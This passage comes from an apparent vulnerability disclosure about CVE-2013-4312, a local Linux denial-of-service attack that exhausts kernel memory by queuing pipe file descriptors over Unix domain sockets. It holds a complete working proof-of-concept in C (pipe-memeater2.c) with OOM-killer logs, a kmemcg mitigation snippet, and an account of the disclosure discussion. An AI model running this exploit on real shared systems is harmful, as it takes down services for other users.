[ 117.101721] CPU 0: hi: 0, btch: 1 usd: 0

[ 117.103026] CPU 1: hi: 0, btch: 1 usd: 0

[ 117.104324] CPU 2: hi: 0, btch: 1 usd: 0

[ 117.105638] CPU 3: hi: 0, btch: 1 usd: 0

[ 117.106938] Node 0 DMA32 per-cpu:

[ 117.107901] CPU 0: hi: 186, btch: 31 usd: 0

[ 117.109194] CPU 1: hi: 186, btch: 31 usd: 0

[ 117.110416] CPU 2: hi: 186, btch: 31 usd: 60

[ 117.111349] CPU 3: hi: 186, btch: 31 usd: 0

[ 117.112250] active_anon:108 inactive_anon:943 isolated_anon:0

[ 117.112250] active_file:12 inactive_file:26 isolated_file:0

[ 117.112251] unevictable:0 dirty:0 writeback:0 unstable:0

[ 117.112251] free:3440 slab_reclaimable:3789 slab_unreclaimable:22390

[ 117.112252] mapped:0 shmem:73 pagetables:199 bounce:0

[ 117.117807] Node 0 DMA free:8064kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:24kB slab_unreclaimable:1044kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes

[ 117.124393] lowmem_reserve[]: 0 2004 2004 2004

[ 117.125326] Node 0 DMA32 free:5696kB min:5708kB low:7132kB high:8560kB active_anon:432kB inactive_anon:3772kB active_file:48kB inactive_file:104kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:292kB slab_reclaimable:15132kB slab_unreclaimable:88516kB kernel_stack:1048kB pagetables:796kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:320 all_unreclaimable? yes

[ 117.132331] lowmem_reserve[]: 0 0 0 0

[ 117.133309] Node 0 DMA: 0*4kB 76*8kB 0*16kB 1*32kB 2*64kB 1*128kB 2*256kB 1*512kB 2*1024kB 2*2048kB 0*4096kB = 8064kB

[ 117.135516] Node 0 DMA32: 699*4kB 1*8kB 6*16kB 2*32kB 2*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 1*2048kB 0*4096kB = 5780kB

[ 117.137807] 112 total pagecache pages

[ 117.138501] 0 pages in swap cache

[ 117.139134] Swap cache stats: add 0, delete 0, find 0/0

[ 117.140090] Free swap = 0kB

[ 117.140602] Total swap = 0kB

[ 117.143667] 524272 pages RAM

[ 117.144630] 13239 pages reserved

[ 117.145267] 275 pages shared

[ 117.145895] 489349 pages non-shared

[ 117.146529] [ pid ] uid tgid total_vm rss cpu oom_adj name

[ 117.147662] [ 1] 0 1 4850 75 0 0 init

[ 117.148883] [ 423] 0 423 2767 200 0 -17 udevd

[ 117.150166] [ 1086] 0 1086 2292 122 1 0 dhclient

[ 117.151359] [ 1142] 0 1142 6399 59 0 -17 auditd

[ 117.152556] [ 1285] 0 1285 5639 46 1 0 hald-addon-rfki

[ 117.153910] [ 1293] 0 1293 5641 47 1 0 hald-addon-inpu

[ 117.155214] [ 1317] 0 1317 16570 177 2 -17 sshd

[ 117.156409] [ 1426] 0 1426 1028 21 2 0 mingetty

[ 117.157610] [ 1428] 0 1428 1028 21 3 0 mingetty

[ 117.158821] [ 1430] 0 1430 1032 21 0 0 agetty

[ 117.160054] [ 1431] 0 1431 1028 21 1 0 mingetty

[ 117.161282] [ 1433] 0 1433 1028 20 1 0 mingetty

[ 117.162468] [ 1435] 0 1435 1028 21 2 0 mingetty

[ 117.163692] [ 1437] 0 1437 2683 116 3 -17 udevd

[ 117.164843] [ 1438] 0 1438 2683 116 2 -17 udevd

[ 117.166093] [ 1694] 500 1694 993 19 2 0 pipe-memeater

[ 117.167424] [ 1695] 500 1695 993 19 2 0 pipe-memeater

[ 117.168767] [ 1697] 0 1697 1028 20 3 0 mingetty

[ 117.170007] Out of memory: kill process 1694 (pipe-memeater) score 993 or a child

[ 117.171449] Killed process 1694 (pipe-memeater) vsz:3972kB, anon-rss:76kB, file-rss:0kB

[kumaneko@localhost ~]$ pstree -pA

init(1)-+-agetty(1430)

|-auditd(1142)---{auditd}(1143)

|-dhclient(1086)

|-hald-addon-inpu(1293)

|-hald-addon-rfki(1285)

|-mingetty(1426)

|-mingetty(1428)

|-mingetty(1431)

|-mingetty(1433)

|-mingetty(1435)

|-mingetty(1697)

|-pipe-memeater(1695)

|-sshd(1317)---sshd(1770)---sshd(1772)---bash(1773)---pstree(1790)

`-udevd(423)-+-udevd(1437)

`-udevd(1438)

[kumaneko@localhost ~]$

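---------- Example output: end ----------

As a result, CVE-2013-4312 was assigned to this vulnerability.

"Come to think of it, the management tools of TOMOYO 1.7 included code that passes file descriptors over a Unix domain socket. That means that, by using a Unix domain socket, a single process could probably assign every file descriptor to a pipe and fill everything up with pipe buffers."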

---------- pipe-memeater2.c ----------
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#define F_SETPIPE_SZ (1024 + 7)

/* Queue fd into the Unix domain socket socket_fd as SCM_RIGHTS ancillary data. */
static int send_fd(int socket_fd, int fd) {
    struct msghdr msg = { };
    struct iovec iov = { "", 1 };
    char cmsg_buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr *cmsg = (struct cmsghdr *) cmsg_buf;

    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cmsg_buf;
    msg.msg_controllen = sizeof(cmsg_buf);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    msg.msg_controllen = cmsg->cmsg_len;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
    return sendmsg(socket_fd, &msg, MSG_DONTWAIT);
}

int main(int argc, char *argv[])
{
    int fd;
    int socket_fd[2] = { EOF, EOF };

    for (fd = 0; fd < 1024; fd++)
        close(fd);
    /* Children that set their own oom_score_adj to 1 and then just sleep. */
    for (fd = 0; fd < 10; fd++)
        if (fork() == 0) {
            fd = open("/proc/self/oom_score_adj", O_WRONLY);
            write(fd, "1", 1);
            close(fd);
            while (1)
                sleep(1);
        }
    /* Fork twice and start a new session; only the grandchild continues. */
    if (fork() || fork() || setsid() == EOF)
        _exit(0);
    if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd))
        _exit(0);
    fd = socket_fd[1];
    while (1) {
        /* Queue one end of a new socket pair into the current socket. */
        if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd) ||
            send_fd(fd, socket_fd[0]) == EOF)
            break;
        while (1) {
            static char buf[4096];
            int ret;
            int pipe_fd[2] = { EOF, EOF };

            if (pipe(pipe_fd))
                break;
            /* Queue the read end of the pipe into the current socket. */
            ret = send_fd(fd, pipe_fd[0]);
            if (argc == 1) {
                /* Grow the pipe to 1MB and fill it without blocking. */
                fcntl(pipe_fd[1], F_SETPIPE_SZ, 1048576);
                fcntl(pipe_fd[1], F_SETFL, O_NONBLOCK | fcntl(pipe_fd[1], F_GETFL));
                while (write(pipe_fd[1], buf, sizeof(buf)) == sizeof(buf));
            }
            /* Close both local descriptors; the queued copy keeps the pipe alive. */
            close(pipe_fd[1]);
            close(pipe_fd[0]);
            if (ret == EOF)
                break;
        }
        /* Continue with the other end of the new socket pair. */
        close(socket_fd[0]);
        close(fd);
        fd = socket_fd[1];
    }
    if (argc != 1)
        while (1)
            sleep(1);
    _exit(0);
}
---------- pipe-memeater2.c ----------

---------- Example output: begin ----------

[kumaneko@localhost ~]$ pstree -pA

init(1)-+-NetworkManager(1271)

|-agetty(1502)

|-auditd(1207)---{auditd}(1208)

|-bonobo-activati(1699)---{bonobo-activat}(1700)

|-console-kit-dae(1510)-+-{console-kit-da}(1511)

| |-{console-kit-da}(1512)

| |-{console-kit-da}(1513)

| |-{console-kit-da}(1514)

| |-{console-kit-da}(1515)

| |-{console-kit-da}(1516)

| |-{console-kit-da}(1517)

| |-{console-kit-da}(1518)

| |-{console-kit-da}(1519)

| |-{console-kit-da}(1520)

| |-{console-kit-da}(1521)

| |-{console-kit-da}(1522)

| |-{console-kit-da}(1523)

| |-{console-kit-da}(1524)

| |-{console-kit-da}(1525)

| |-{console-kit-da}(1526)

| |-{console-kit-da}(1527)

| |-{console-kit-da}(1528)

| |-{console-kit-da}(1529)

| |-{console-kit-da}(1530)

| |-{console-kit-da}(1531)

| |-{console-kit-da}(1532)

| |-{console-kit-da}(1533)

| |-{console-kit-da}(1534)

| |-{console-kit-da}(1535)

| |-{console-kit-da}(1536)

| |-{console-kit-da}(1537)

| |-{console-kit-da}(1538)

| |-{console-kit-da}(1539)

| |-{console-kit-da}(1540)

| |-{console-kit-da}(1541)

| |-{console-kit-da}(1542)

| |-{console-kit-da}(1543)

| |-{console-kit-da}(1544)

| |-{console-kit-da}(1545)

| |-{console-kit-da}(1546)

| |-{console-kit-da}(1547)

| |-{console-kit-da}(1548)

| |-{console-kit-da}(1549)

| |-{console-kit-da}(1550)

| |-{console-kit-da}(1551)

| |-{console-kit-da}(1552)

| |-{console-kit-da}(1553)

| |-{console-kit-da}(1554)

| |-{console-kit-da}(1555)

| |-{console-kit-da}(1556)

| |-{console-kit-da}(1557)

| |-{console-kit-da}(1558)

| |-{console-kit-da}(1559)

| |-{console-kit-da}(1560)

| |-{console-kit-da}(1561)

| |-{console-kit-da}(1562)

| |-{console-kit-da}(1563)

| |-{console-kit-da}(1564)

| |-{console-kit-da}(1565)

| |-{console-kit-da}(1566)

| |-{console-kit-da}(1567)

| |-{console-kit-da}(1568)

| |-{console-kit-da}(1569)

| |-{console-kit-da}(1570)

| |-{console-kit-da}(1571)

| |-{console-kit-da}(1572)

| `-{console-kit-da}(1574)

|-crond(1476)

|-dbus-daemon(1670)

|-dbus-daemon(1258)

|-dbus-launch(1669)

|-devkit-power-da(1674)

|-dhclient(1151)

|-gconfd-2(1680)

|-gdm-binary(1636)-+-gdm-simple-slav(1649)-+-Xorg(1652)

| | |-gdm-session-wor(1730)

| | |-gnome-session(1671)-+-at-spi-registry(1694)

| | | |-gdm-simple-gree(1710)

| | | |-gnome-power-man(1711)

| | | |-metacity(1707)

| | | |-polkit-gnome-au(1709)

| | | `-{gnome-session}(1695)

| | `-{gdm-simple-sla}(1653)

| `-{gdm-binary}(1650)

|-gnome-settings-(1697)---{gnome-settings}(1702)

|-gvfsd(1706)

|-hald(1310)-+-hald-runner(1311)-+-hald-addon-acpi(1366)

| | |-hald-addon-inpu(1359)

| | `-hald-addon-rfki(1349)

| `-{hald}(1312)

|-login(1492)---bash(1577)

|-master(1464)-+-pickup(1481)

| `-qmgr(1482)

|-mingetty(1494)

|-mingetty(1496)

|-mingetty(1498)

|-mingetty(1500)

|-mingetty(1503)

|-modem-manager(1275)

|-notification-da(1716)

|-polkitd(1714)

|-pulseaudio(1723)---{pulseaudio}(1729)

|-rsyslogd(1229)-+-{rsyslogd}(1230)

| |-{rsyslogd}(1231)

| `-{rsyslogd}(1233)

|-rtkit-daemon(1725)-+-{rtkit-daemon}(1726)

| `-{rtkit-daemon}(1727)

|-sshd(1385)---sshd(1733)---sshd(1735)---bash(1736)---pstree(1753)

|-udevd(487)-+-udevd(1507)

| `-udevd(1508)

`-wpa_supplicant(1350)

[kumaneko@localhost ~]$ ./pipe-memeater2

(re-login portion omitted)

[kumaneko@localhost ~]$ dmesg

[ 132.693170] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0, oom_score_adj=0

[ 132.695011] pipe-memeater2 cpuset=/ mems_allowed=0

[ 132.695984] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1

[ 132.697532] Call Trace:

[ 132.698055] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0

[ 132.699429] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0

[ 132.700575] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70

[ 132.701822] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0

[ 132.702877] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120

[ 132.704026] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0

[ 132.705082] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950

[ 132.706243] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110

[ 132.707432] [<ffffffff8119d274>] ? pipe_write+0x3c4/0x6b0

[ 132.708457] [<ffffffff81191f0a>] ? do_sync_write+0xfa/0x140

[ 132.709525] [<ffffffff81177f49>] ? ____cache_alloc_node+0x99/0x160

[ 132.710684] [<ffffffff810a1820>] ? autoremove_wake_function+0x0/0x40

[ 132.712004] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160

[ 132.712954] [<ffffffff81232026>] ? security_file_permission+0x16/0x20

[ 132.714140] [<ffffffff81192208>] ? vfs_write+0xb8/0x1a0

[ 132.715225] [<ffffffff811936f6>] ? fget_light_pos+0x16/0x50

[ 132.716293] [<ffffffff81192d41>] ? sys_write+0x51/0xb0

[ 132.717298] [<ffffffff810e8c2e>] ? __audit_syscall_exit+0x25e/0x290

[ 132.718554] [<ffffffff8100b0d2>] ? system_call_fastpath+0x16/0x1b

[ 132.719749] Mem-Info:

[ 132.720206] Node 0 DMA per-cpu:

[ 132.720817] CPU 0: hi: 0, btch: 1 usd: 0

[ 132.721771] CPU 1: hi: 0, btch: 1 usd: 0

[ 132.722666] CPU 2: hi: 0, btch: 1 usd: 0

[ 132.723666] CPU 3: hi: 0, btch: 1 usd: 0

[ 132.724652] Node 0 DMA32 per-cpu:

[ 132.725328] CPU 0: hi: 186, btch: 31 usd: 0

[ 132.726211] CPU 1: hi: 186, btch: 31 usd: 36

[ 132.727161] CPU 2: hi: 186, btch: 31 usd: 0

[ 132.728076] CPU 3: hi: 186, btch: 31 usd: 3

[ 132.728950] active_anon:14917 inactive_anon:249 isolated_anon:0

[ 132.728951] active_file:0 inactive_file:18 isolated_file:0

[ 132.728951] unevictable:0 dirty:8 writeback:0 unstable:0

[ 132.728951] free:13255 slab_reclaimable:7730 slab_unreclaimable:20346

[ 132.728952] mapped:281 shmem:306 pagetables:1876 bounce:0

[ 132.734252] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:84kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes

[ 132.742139] lowmem_reserve[]: 0 2004 2004 2004

[ 132.743187] Node 0 DMA32 free:44676kB min:44720kB low:55900kB high:67080kB active_anon:59668kB inactive_anon:996kB active_file:0kB inactive_file:72kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:32kB writeback:0kB mapped:1124kB shmem:1224kB slab_reclaimable:30836kB slab_unreclaimable:81132kB kernel_stack:4384kB pagetables:7504kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:191 all_unreclaimable? yes

[ 132.750447] lowmem_reserve[]: 0 0 0 0

[ 132.751251] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB

[ 132.753469] Node 0 DMA32: 1595*4kB 865*8kB 431*16kB 241*32kB 130*64kB 34*128kB 2*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 44676kB

[ 132.755994] 356 total pagecache pages

[ 132.756679] 0 pages in swap cache

[ 132.757295] Swap cache stats: add 0, delete 0, find 0/0

[ 132.758283] Free swap = 0kB

[ 132.758803] Total swap = 0kB

[ 132.761657] 524272 pages RAM

[ 132.762296] 45689 pages reserved

[ 132.762876] 1143 pages shared

[ 132.763423] 459523 pages non-shared

[ 132.764069] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name

[ 132.765411] [ 487] 0 487 2699 145 0 -17 -1000 udevd

[ 132.766814] [ 1151] 0 1151 2280 123 1 0 0 dhclient

[ 132.768201] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd

[ 132.769536] [ 1229] 0 1229 62271 648 3 0 0 rsyslogd

[ 132.770997] [ 1258] 81 1258 5459 168 2 0 0 dbus-daemon

[ 132.772434] [ 1271] 0 1271 20705 222 3 0 0 NetworkManager

[ 132.773961] [ 1275] 0 1275 14530 124 3 0 0 modem-manager

[ 132.775459] [ 1310] 68 1310 9588 292 3 0 0 hald

[ 132.776834] [ 1311] 0 1311 5099 55 3 0 0 hald-runner

[ 132.778298] [ 1349] 0 1349 5627 46 1 0 0 hald-addon-rfki

[ 132.779789] [ 1350] 0 1350 11247 134 0 0 0 wpa_supplicant

[ 132.781244] [ 1359] 0 1359 5629 46 3 0 0 hald-addon-inpu

[ 132.782802] [ 1366] 68 1366 4501 41 1 0 0 hald-addon-acpi

[ 132.784277] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd

[ 132.785665] [ 1464] 0 1464 20222 226 3 0 0 master

[ 132.787005] [ 1476] 0 1476 29216 153 0 0 0 crond

[ 132.788365] [ 1481] 89 1481 20242 218 2 0 0 pickup

[ 132.789833] [ 1482] 89 1482 20259 219 0 0 0 qmgr

[ 132.791187] [ 1492] 0 1492 17403 127 1 0 0 login

[ 132.792555] [ 1494] 0 1494 1016 21 0 0 0 mingetty

[ 132.794302] [ 1496] 0 1496 1016 21 0 0 0 mingetty

[ 132.795719] [ 1498] 0 1498 1016 22 0 0 0 mingetty

[ 132.797089] [ 1500] 0 1500 1016 22 0 0 0 mingetty

[ 132.798541] [ 1502] 0 1502 1020 23 0 0 0 agetty

[ 132.799880] [ 1503] 0 1503 1016 20 0 0 0 mingetty

[ 132.801484] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd

[ 132.802964] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd

[ 132.804308] [ 1510] 0 1510 521256 341 3 0 0 console-kit-dae

[ 132.805966] [ 1577] 0 1577 27076 95 2 0 0 bash

[ 132.807295] [ 1636] 0 1636 33501 81 0 0 0 gdm-binary

[ 132.808710] [ 1649] 0 1649 41156 153 3 0 0 gdm-simple-slav

[ 132.810269] [ 1652] 0 1652 42840 4384 3 0 0 Xorg

[ 132.811594] [ 1669] 42 1669 5009 66 2 0 0 dbus-launch

[ 132.813061] [ 1670] 42 1670 5390 86 3 0 0 dbus-daemon

[ 132.814495] [ 1671] 42 1671 67289 479 1 0 0 gnome-session

[ 132.815956] [ 1674] 0 1674 12490 161 3 0 0 devkit-power-da

[ 132.817561] [ 1680] 42 1680 33055 539 3 0 0 gconfd-2

[ 132.819058] [ 1694] 42 1694 30175 292 0 0 0 at-spi-registry

[ 132.820530] [ 1697] 42 1697 86838 958 1 0 0 gnome-settings-

[ 132.822181] [ 1699] 42 1699 89636 197 1 0 0 bonobo-activati

[ 132.823653] [ 1706] 42 1706 33819 82 1 0 0 gvfsd

[ 132.825062] [ 1707] 42 1707 71453 682 1 0 0 metacity

[ 132.826434] [ 1709] 42 1709 62076 443 0 0 0 polkit-gnome-au

[ 132.827924] [ 1710] 42 1710 95132 1239 3 0 0 gdm-simple-gree

[ 132.829457] [ 1711] 42 1711 68423 516 3 0 0 gnome-power-man

[ 132.830948] [ 1714] 0 1714 13157 303 2 0 0 polkitd

[ 132.832303] [ 1723] 42 1723 86434 201 2 0 0 pulseaudio

[ 132.833781] [ 1725] 498 1725 42113 53 2 0 0 rtkit-daemon

[ 132.835231] [ 1730] 0 1730 35441 95 3 0 0 gdm-session-wor

[ 132.836776] [ 1733] 0 1733 25629 255 0 0 0 sshd

[ 132.838102] [ 1735] 500 1735 25629 256 0 0 0 sshd

[ 132.839429] [ 1736] 500 1736 27076 94 2 0 0 bash

[ 132.840851] [ 1755] 500 1755 981 20 3 0 1 pipe-memeater2

[ 132.842372] [ 1756] 500 1756 981 20 0 0 1 pipe-memeater2

[ 132.843858] [ 1757] 500 1757 981 20 1 0 1 pipe-memeater2

[ 132.845384] [ 1758] 500 1758 981 20 3 0 1 pipe-memeater2

[ 132.846866] [ 1759] 500 1759 981 20 0 0 1 pipe-memeater2

[ 132.848426] [ 1760] 500 1760 981 20 1 0 1 pipe-memeater2

[ 132.850046] [ 1761] 500 1761 981 20 0 0 1 pipe-memeater2

[ 132.851526] [ 1762] 500 1762 981 20 3 0 1 pipe-memeater2

[ 132.853038] [ 1763] 500 1763 981 20 0 0 1 pipe-memeater2

[ 132.854517] [ 1764] 500 1764 981 20 1 0 1 pipe-memeater2

[ 132.856059] [ 1766] 500 1766 981 20 1 0 0 pipe-memeater2

[ 132.857548] Out of memory: Kill process 1697 (gnome-settings-) score 2 or sacrifice child

[ 132.859015] Killed process 1697, UID 42, (gnome-settings-) total-vm:347352kB, anon-rss:3252kB, file-rss:580kB

(repeated portion omitted)

[ 137.704574] pipe-memeater2 invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0, oom_score_adj=0

[ 137.707278] pipe-memeater2 cpuset=/ mems_allowed=0

[ 137.708516] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1

[ 137.710327] Call Trace:

[ 137.711014] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0

[ 137.712503] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0

[ 137.713895] [<ffffffff8153c797>] ? _spin_unlock_irqrestore+0x17/0x20

[ 137.715475] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0

[ 137.716797] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120

[ 137.718171] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0

[ 137.719466] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950

[ 137.720710] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110

[ 137.721864] [<ffffffff81127d47>] ? __page_cache_alloc+0x87/0x90

[ 137.723103] [<ffffffff8112772e>] ? find_get_page+0x1e/0xa0

[ 137.724195] [<ffffffff81128ce7>] ? filemap_fault+0x1a7/0x500

[ 137.725370] [<ffffffff811522c4>] ? __do_fault+0x54/0x530

[ 137.726422] [<ffffffff8107ed47>] ? current_fs_time+0x27/0x30

[ 137.727569] [<ffffffff81152897>] ? handle_pte_fault+0xf7/0xb20

[ 137.728774] [<ffffffff8119d1da>] ? pipe_write+0x32a/0x6b0

[ 137.730021] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0

[ 137.731316] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500

[ 137.732674] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160

[ 137.733747] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0

[ 137.735073] [<ffffffff8153cc55>] ? page_fault+0x25/0x30

[ 137.736314] Mem-Info:

[ 137.737119] Node 0 DMA per-cpu:

[ 137.738204] CPU 0: hi: 0, btch: 1 usd: 0

[ 137.739307] CPU 1: hi: 0, btch: 1 usd: 0

[ 137.740428] CPU 2: hi: 0, btch: 1 usd: 0

[ 137.741553] CPU 3: hi: 0, btch: 1 usd: 0

[ 137.742553] Node 0 DMA32 per-cpu:

[ 137.743233] CPU 0: hi: 186, btch: 31 usd: 4

[ 137.745237] CPU 1: hi: 186, btch: 31 usd: 0

[ 137.746208] CPU 2: hi: 186, btch: 31 usd: 0

[ 137.747148] CPU 3: hi: 186, btch: 31 usd: 0

[ 137.748115] active_anon:634 inactive_anon:18 isolated_anon:0

[ 137.748115] active_file:0 inactive_file:96 isolated_file:0

[ 137.748116] unevictable:0 dirty:0 writeback:0 unstable:0

[ 137.748116] free:13318 slab_reclaimable:7641 slab_unreclaimable:20767

[ 137.748117] mapped:21 shmem:75 pagetables:118 bounce:0

[ 137.753688] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:92kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes

[ 137.760653] lowmem_reserve[]: 0 2004 2004 2004

[ 137.761734] Node 0 DMA32 free:44928kB min:44720kB low:55900kB high:67080kB active_anon:2536kB inactive_anon:72kB active_file:0kB inactive_file:384kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:84kB shmem:300kB slab_reclaimable:30472kB slab_unreclaimable:82816kB kernel_stack:2928kB pagetables:472kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 137.769505] lowmem_reserve[]: 0 0 0 0

[ 137.770383] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB

[ 137.772807] Node 0 DMA32: 810*4kB 612*8kB 293*16kB 185*32kB 99*64kB 50*128kB 15*256kB 9*512kB 3*1024kB 1*2048kB 0*4096kB = 45048kB

[ 137.775481] 239 total pagecache pages

[ 137.776214] 0 pages in swap cache

[ 137.776877] Swap cache stats: add 0, delete 0, find 0/0

[ 137.777916] Free swap = 0kB

[ 137.778504] Total swap = 0kB

[ 137.781695] 524272 pages RAM

[ 137.782347] 45689 pages reserved

[ 137.783046] 314 pages shared

[ 137.783631] 460183 pages non-shared

[ 137.784339] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name

[ 137.785819] [ 487] 0 487 2699 145 0 -17 -1000 udevd

[ 137.787313] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd

[ 137.788720] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd

[ 137.790073] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd

[ 137.791486] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd

[ 137.792912] [ 1766] 500 1766 981 20 3 0 0 pipe-memeater2

[ 137.794509] Out of memory: Kill process 1766 (pipe-memeater2) score 1 or sacrifice child

[ 137.796076] Killed process 1766, UID 500, (pipe-memeater2) total-vm:3924kB, anon-rss:80kB, file-rss:0kB

[kumaneko@localhost ~]$ pstree -pA

init(1)-+-agetty(1777)

|-auditd(1207)---{auditd}(1208)

|-mingetty(1768)

|-mingetty(1769)

|-mingetty(1770)

|-mingetty(1771)

|-mingetty(1772)

|-mingetty(1773)

|-sshd(1385)---sshd(1856)---sshd(1858)---bash(1859)---pstree(1877)

`-udevd(487)-+-udevd(1507)

`-udevd(1508)

[kumaneko@localhost ~]$

---------- Example output: end ----------

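In other words, this attack works not only on Linux 2.6.35 and later, which include the patch in question, but on every version from Linux 2.0 (released June 1996) onward, all of which can pass file descriptors over Unix domain sockets.

→ Practically every Linux system that is likely to be in operation today is affected.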

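On Linux 3.8 and later, where kmemcg (the kernel-memory part of memory cgroup) became available, configuring kmemcg appropriately makes it possible to limit the amount of memory the kernel uses, such as the memory allocated to pipe buffers.

However, no such limit can be imposed on systems running Linux 3.7 or earlier (which do not support kmemcg) or on systems where kmemcg has not been configured.

→ Of the systems that allow users to run programs they wrote themselves, how many actually have kmemcg enabled as well?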
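
As a minimal sketch of what "configuring kmemcg" can look like, the following writes a kernel-memory limit into a cgroup v1 memory controller directory. The helper name `set_kmem_limit` is hypothetical, and the directory in the usage note is an assumption (a group named "untrusted" under a memory controller mounted at /sys/fs/cgroup/memory). The file name `memory.kmem.limit_in_bytes` is the cgroup v1 interface; it is only present on kernels built with kernel-memory accounting, and it requires sufficient privileges to write.

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Hypothetical helper: write `bytes` to memory.kmem.limit_in_bytes
 * inside the cgroup v1 memory controller directory `cgroup_dir`.
 * Returns 0 on success, -1 on failure.
 */
int set_kmem_limit(const char *cgroup_dir, unsigned long long bytes)
{
	char path[4096];
	char value[32];
	int len;
	int fd;
	int ret = -1;

	len = snprintf(path, sizeof(path), "%s/memory.kmem.limit_in_bytes",
		       cgroup_dir);
	if (len < 0 || (size_t) len >= sizeof(path))
		return -1;
	len = snprintf(value, sizeof(value), "%llu", bytes);
	/* The control file must already exist; it is never created here. */
	fd = open(path, O_WRONLY);
	if (fd == -1)
		return -1;
	/* Write the whole value in one write() call. */
	if (write(fd, value, len) == len)
		ret = 0;
	close(fd);
	return ret;
}
```

For example, `set_kmem_limit("/sys/fs/cgroup/memory/untrusted", 64ULL << 20)` would request a 64 MiB limit for that assumed group. The limit only affects processes that have been placed in the group, and choosing a value that is neither too loose nor too tight is exactly the difficulty raised above.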

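The issue was discussed on the private mailing list for handling vulnerabilities ( security@kernel.org ). However, it was not regarded as a problem worth addressing seriously.

・The view that allowing untrusted local users to log in is the real mistake in the first place.

→ Privilege escalation attacks by local users are dealt with promptly, so is it really acceptable that local DoS attacks by local users are not?

・The view that the problem can be mitigated by setting appropriate limits with kmemcg in memory cgroup.

→ Can it actually be configured appropriately? And are users of older kernels without kmemcg support simply to be abandoned?

・The fact that other attack methods exist as well.

→ Drawing on my experience developing access control modules such as CaitSith, I proposed an LSM module that limits the number of usable file descriptors based on user ID or group ID, but it was not adopted on the grounds that it was "overkill for this problem".

As a result, the situation dragged on with no solution in sight.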

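In the midst of this, RHEL 7 beta was released (December 2013).

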